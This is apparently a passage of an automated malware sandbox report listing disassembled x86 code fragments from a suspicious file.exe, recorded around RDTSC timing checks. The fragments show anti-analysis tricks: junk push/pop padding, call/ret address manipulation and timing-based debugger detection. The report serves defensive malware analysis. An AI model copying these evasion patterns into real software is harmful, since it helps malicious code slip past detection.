0x00000053 push edx 0x00000054 call 00007F47DD40FB78h 0x00000059 pop edx 0x0000005a mov dword ptr [esp+04h], edx 0x0000005e add dword ptr [esp+04h], 00000018h 0x00000066 inc edx 0x00000067 push edx 0x00000068 ret 0x00000069 pop edx 0x0000006a ret 0x0000006b push eax 0x0000006c jbe 00007F47DD40FBACh 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007F47DD40FB88h 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B32C second address: E1B330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B330 second address: E1B33A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F47DD40FB76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B33A second address: E1B33E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B33E second address: E1B34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B34B second address: E1B371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D39F0h], edi 0x00000011 push 00000000h 0x00000013 mov si, 756Ah 0x00000017 call 00007F47DCFB8A39h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B371 second address: E1B375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B375 second address: E1B37B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B37B second address: E1B3A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F47DD40FB76h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F47DD40FB84h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B3A7 second address: E1B3CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jmp 00007F47DCFB8A3Ch 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B3CE second address: E1B470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F47DD40FB85h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jp 00007F47DD40FB78h 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007F47DD40FB78h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 mov ecx, eax 0x0000003a push 00000000h 0x0000003c mov edx, eax 0x0000003e push 00000003h 0x00000040 push 00000000h 0x00000042 push eax 0x00000043 call 00007F47DD40FB78h 0x00000048 pop eax 0x00000049 mov dword ptr [esp+04h], eax 0x0000004d add dword ptr [esp+04h], 0000001Dh 0x00000055 inc eax 0x00000056 push eax 0x00000057 ret 0x00000058 pop eax 0x00000059 ret 0x0000005a jmp 00007F47DD40FB7Bh 0x0000005f sub dword ptr [ebp+122D2B95h], edi 0x00000065 call 00007F47DD40FB79h 0x0000006a push eax 0x0000006b push edx 0x0000006c jne 00007F47DD40FB7Ch 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B470 second address: E1B47A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F47DCFB8A36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B47A second address: E1B4CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F47DD40FB85h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jbe 00007F47DD40FB82h 0x0000001b jne 00007F47DD40FB7Ch 0x00000021 mov eax, dword ptr [eax] 0x00000023 pushad 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B599 second address: E1B59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B692 second address: E1B6C8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F47DD40FB7Ch 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 ja 00007F47DD40FB82h 0x00000018 mov eax, dword ptr [eax] 0x0000001a js 00007F47DD40FB7Eh 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B6C8 second address: E1B6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2E22A second address: E2E22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3C853 second address: E3C859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3A79F second address: E3A7B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB82h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3A7B5 second address: E3A7BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3A943 second address: E3A9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jne 00007F47DD40FB83h 0x0000000f jg 00007F47DD40FB91h 0x00000015 jmp 00007F47DD40FB7Bh 0x0000001a popad 0x0000001b pushad 0x0000001c push esi 0x0000001d jmp 00007F47DD40FB84h 0x00000022 jmp 00007F47DD40FB86h 0x00000027 pop esi 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3AB12 second address: E3AB1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3AC6A second address: E3AC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007F47DD40FB83h 0x0000000b pop ebx 0x0000000c jnp 00007F47DD40FB92h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3AF17 second address: E3AF32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A45h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B260 second address: E3B26E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47DD40FB7Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B26E second address: E3B29D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F47DCFB8A48h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jnl 00007F47DCFB8A57h 0x00000013 pushad 0x00000014 jc 00007F47DCFB8A36h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B417 second address: E3B41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B85D second address: E3B888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jne 00007F47DCFB8A36h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F47DCFB8A44h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B888 second address: E3B88C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E318CD second address: E318DC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F47DCFB8A38h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0430B second address: E04311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E04311 second address: E04317 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3C2A8 second address: E3C2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3C6C6 second address: E3C6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007F47DCFB8A36h 0x0000000c popad 0x0000000d je 00007F47DCFB8A3Ah 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4109A second address: E410A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E410A0 second address: E41103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 jng 00007F47DCFB8A4Dh 0x00000016 jmp 00007F47DCFB8A47h 0x0000001b jbe 00007F47DCFB8A38h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 popad 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F47DCFB8A47h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E41103 second address: E4110D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F47DD40FB76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3F991 second address: E3F997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4522C second address: E45246 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E45246 second address: E452A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007F47DCFB8A3Eh 0x0000000b jnp 00007F47DCFB8A36h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007F47DCFB8A48h 0x0000001a jmp 00007F47DCFB8A3Eh 0x0000001f jmp 00007F47DCFB8A3Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F47DCFB8A47h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E49FFB second address: E49FFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E49FFF second address: E4A011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F47DCFB8A36h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4A011 second address: E4A015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4A015 second address: E4A01B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4A648 second address: E4A64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C79C second address: E4C7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C7A1 second address: E4C7B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C7B4 second address: E4C7CF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F47DCFB8A36h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jc 00007F47DCFB8A36h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C7CF second address: E4C7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D2F1 second address: E4D2F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D2F7 second address: E4D2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D4AA second address: E4D4B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D913 second address: E4D93A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F47DD40FB76h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jmp 00007F47DD40FB84h 0x00000017 pop ecx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D93A second address: E4D956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+122D2B90h], edx 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D956 second address: E4D95A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4DE67 second address: E4DEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F47DCFB8A38h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov si, BEBDh 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F47DCFB8A38h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 pushad 0x00000047 push esi 0x00000048 sub dword ptr [ebp+122D3402h], eax 0x0000004e pop esi 0x0000004f jmp 00007F47DCFB8A46h 0x00000054 popad 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F47DCFB8A41h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4E8BE second address: E4E933 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F47DD40FB7Fh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F47DD40FB78h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 xor dword ptr [ebp+122D1B51h], esi 0x0000002e jnc 00007F47DD40FB7Ch 0x00000034 push 00000000h 0x00000036 movzx edi, cx 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b push ebx 0x0000003c jmp 00007F47DD40FB7Eh 0x00000041 pop ebx 0x00000042 push edx 0x00000043 push ecx 0x00000044 pop ecx 0x00000045 pop edx 0x00000046 popad 0x00000047 push eax 0x00000048 je 00007F47DD40FB7Eh 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4E75E second address: E4E777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47DCFB8A45h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F75C second address: E4F82B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47DD40FB88h 0x00000008 jmp 00007F47DD40FB88h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 jnl 00007F47DD40FB89h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F47DD40FB78h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 call 00007F47DD40FB86h 0x00000038 pop edi 0x00000039 mov dword ptr [ebp+122D3402h], ecx 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push edi 0x00000044 call 00007F47DD40FB78h 0x00000049 pop edi 0x0000004a mov dword ptr [esp+04h], edi 0x0000004e add dword ptr [esp+04h], 00000018h 0x00000056 inc edi 0x00000057 push edi 0x00000058 ret 0x00000059 pop edi 0x0000005a ret 0x0000005b mov dword ptr [ebp+122D2438h], ebx 0x00000061 xchg eax, ebx 0x00000062 pushad 0x00000063 jno 00007F47DD40FB7Ch 0x00000069 jc 00007F47DD40FB7Ch 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5020A second address: E5020E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E502C0 second address: E502C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50018 second address: E50044 instructions: 0x00000000 rdtsc 0x00000002 je 00007F47DCFB8A36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jo 00007F47DCFB8A5Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F47DCFB8A48h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E51F52 second address: E51F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E52220 second address: E52224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E51F57 second address: E51F7F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F47DD40FB87h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F47DD40FB78h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56B5C second address: E56B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E534CA second address: E534E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F47DD40FB78h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56B61 second address: E56BEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F47DCFB8A38h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 jnp 00007F47DCFB8A39h 0x0000002a adc bh, 00000073h 0x0000002d mov ebx, edi 0x0000002f push 00000000h 0x00000031 jnp 00007F47DCFB8A3Bh 0x00000037 mov edi, dword ptr [ebp+122D1DB4h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F47DCFB8A38h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 0000001Ch 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 sub dword ptr [ebp+122D1DC1h], esi 0x0000005f clc 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 jg 00007F47DCFB8A36h 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56BEB second address: E56BF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E534E3 second address: E534E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E534E8 second address: E534EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E57D0D second address: E57D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E57D11 second address: E57D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F47DD40FB7Ch 0x00000016 jc 00007F47DD40FB76h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E57D2D second address: E57D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47DCFB8A3Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58F29 second address: E58F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56D7E second address: E56D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5800A second address: E58010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
